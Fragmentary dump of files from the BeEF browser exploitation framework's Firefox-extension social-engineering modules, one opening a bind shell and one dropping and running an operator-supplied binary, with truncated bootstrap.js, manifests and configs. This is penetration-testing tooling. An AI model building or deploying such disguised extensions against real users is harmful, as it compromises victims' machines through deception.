# See the file 'doc/COPYING' for copying permission
#
beef:
module:
firefox_extension_bindshell:
enable: true
category: ["Social Engineering"]
nam... |
Ruby | beef/modules/social_engineering/firefox_extension_bindshell/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Firefox_extension_bindshell < BeEF::Core::Command
class Bind_extension < BeEF::Core::Router::Router
before do
headers 'Con... |
JavaScript | beef/modules/social_engineering/firefox_extension_bindshell/extension/bootstrap.js | function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
file.append(x... |
beef/modules/social_engineering/firefox_extension_bindshell/extension/chrome.manifest | content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./
overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul | |
beef/modules/social_engineering/firefox_extension_bindshell/extension/install.rdf | <?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
<em:name>__extension_name_placeholder__</em:name>
<em:version>1.0</em:vers... | |
beef/modules/social_engineering/firefox_extension_bindshell/extension/overlay.xul | <?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay> | |
JavaScript | beef/modules/social_engineering/firefox_extension_dropper/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var xpi_name = '<%= @xpi_name %>';
var base_host ='<%= @base_host %>';
var ff_extension = '/' + ... |
YAML | beef/modules/social_engineering/firefox_extension_dropper/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
firefox_extension_dropper:
enable: true
category: ["Social Engineering"]
name:... |
Ruby | beef/modules/social_engineering/firefox_extension_dropper/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Firefox_extension_dropper < BeEF::Core::Command
class Bind_extension < BeEF::Core::Router::Router
before do
headers 'Conte... |
Text | beef/modules/social_engineering/firefox_extension_dropper/dropper/readme.txt | Place in this directory the binary you want to drop and execute through the Firefox extension.
Make sure to have just ONE file in this directory (other than this readme.txt). |
JavaScript | beef/modules/social_engineering/firefox_extension_dropper/extension/bootstrap.js | function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";payload_name="__... |
beef/modules/social_engineering/firefox_extension_dropper/extension/chrome.manifest | content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./
overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul | |
beef/modules/social_engineering/firefox_extension_dropper/extension/install.rdf | <?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{861fb387-92ce-bb0a-cb48-4b923dbc292b}</em:id>
<em:name>__extension_name_placeholder__</em:name>
<em:version>1.0</em:vers... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.